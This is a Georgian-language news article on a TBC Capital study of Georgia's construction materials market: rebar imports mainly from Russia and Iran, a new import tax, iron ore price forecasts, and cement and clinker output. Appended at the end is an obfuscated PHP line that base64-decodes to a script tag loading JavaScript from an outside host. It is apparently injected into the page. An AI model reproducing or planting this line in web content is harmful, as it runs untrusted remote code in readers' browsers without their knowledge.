gorgia
jaluzi

 საქართველოში იმპორტირებული არმატურის 51% რუსეთზე მოდის, 43%-ი კი ირანიდან შემოდის - ამის შესახებ აღნიშნულია „თიბისი კაპიტალის“ კვლევაში. ამასთან, კვლევის მიხედვით, 2019 წლიდან საქართველოში მშენებლობის ხარჯები მნიშვნელოვნად გაიზარდა, განსაკუთრებით მკვეთრი ზრდა 2021-2022 წლებში ფიქსირდება.

კვლევის მიხედვით, საწყისი ფასების მატება სამშენებლო მასალებმა განაპირობა, რაც პანდემიასთან და ომთან დაკავშირებული ფასების მკვეთრ ზრდას ასახავდა.
ამასთან, კვლევაში საუბარია საქართველოს მთავრობის ერთ-ერთ ბოლო გადაწყვეტილებაზე, რომლის მიხედვითაც 2025 წლის 25 იანვრიდან რკინის ღეროებსა და არმატურის იმპორტზე გადასახადი ამოქმედდა, ტონაზე 420 ლარის ოდენობით. აღნიშნული გადასახადი ძალაშია მიმდინარე წლის 1-ელ სექტემბრამდე. როგორც კვლევაშია ნათქვამი, მოსალოდნელია, რომ გადასახადის დაწესება შეამცირებს პროდუქტის იმპორტს და გაზრდის ადგილობრივ წარმოებას.
პუბლიკაციაში მოყვანილია აღნიშნული პროდუქტის როგორც ადგილობრივი წარმოების, ასევე იმპორტის მაჩვენებელი. კვლევის მიხედვით, საქართველოში 2024 წელს რკინის ღეროებსა და არმატურის იმპორტის მოცულობამ 395 ათასი ტონა შეადგინა, ეს კი 56%-ით მეტია წინა წლის მაჩვენებელთან შედარებით, 2023 წელს ქვეყანამ 253 ათასი ტონა არმატურა იყიდა. ამავე საანგარიშო პერიოდში ადგილობრივი წარმოება 307 ათასი ტონიდან (2023 წელი) 294 ათას ტონამდე (2024 წელი) შემცირდა.
„თიბისი კაპიტალის“ მიხედვით, გასულ წელს რკინის ღეროებსა და არმატურის იმპორტის 51% რუსეთზე მოდიოდა, 43% - ირანზე, 5% - აზერბაიჯანზე. მცირე რაოდენობით პროდუქტი შემოვიდა თურქეთიდან.
რაც შეეხება ფასებს, კვლევის მიხედვით, 2024 წელს საქართველოს ერთი ტონა არმატურის იმპორტი 568 დოლარი დაუჯდა, რაც წინა წელთან შედარებით 25 დოლარით ნაკლებია (2023 წელი - 593 დოლარი). აღნიშნული კი გამოწვეულია მსოფლიო ბაზარზე რკინის მადნის ფასის შემცირებით, რომელიც 2025 წელსაც გაგრძელდა (ცნობისათვის, რკინის მადანი რკინის ღეროებისა და არმატურის წარმოებისთვის ძირითადი ნედლეულია)
კვლევის მიხედვით, 2025 წლის მარტის მდგომარეობით, რკინის მადნის ფასი შეადგენს 103.1 დოლარს ტონაზე, რაც 16%-ით შემცირებულია 2024 წლის პირველი კვარტლის საშუალო მაჩვენებელთან შედარებით. 2025 წლის პროგნოზირებული ფასი შეადგენს 95.7 დოლარს ტონაზე, ხოლო 2026 წლიდან ფასები მოსალოდნელია დასტაბილურდეს და ტონაზე 90 დოლარი შეადგინოს.
განსხვავებით არმატურისგან, მშენებლობისთვის ერთ-ერთი ყველაზე მნიშვნელოვანი პროდუქტის - ცემენტის შემთხვევაში, ადგილობრივი წარმოება იმპორტისას ბევრად აღემატება. კერძოდ, 2024 წელს იმპორტირებული იქნა 184 ათასი ტონა ცემენტი, 2023 წელს კი 202 ათასი ტონა. ადგილობრივი წარმოება კი 2.753 მლნ ტონიდან, 3.073 მლნ ტონამდე გაიზარდა.
რაც შეეხება კლინკერს, 2024 წელს, იმპორტით ის აზერბაიჯანისგან და თურქეთისგან შევიძინეთ და საერთო მოცულობამ 1.170 მლნ ტონა შეადგინა, მაშინ, როდესაც 2023-ში, იმპორტით 824 ათასი ტონა ვიყიდეთ.
ცნობისთვის, ცემენტის წარმოება დამოკიდებულია კლინკერზე, რომელიც მის ძირითად ნედლეულს წარმოადგენს.
202
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");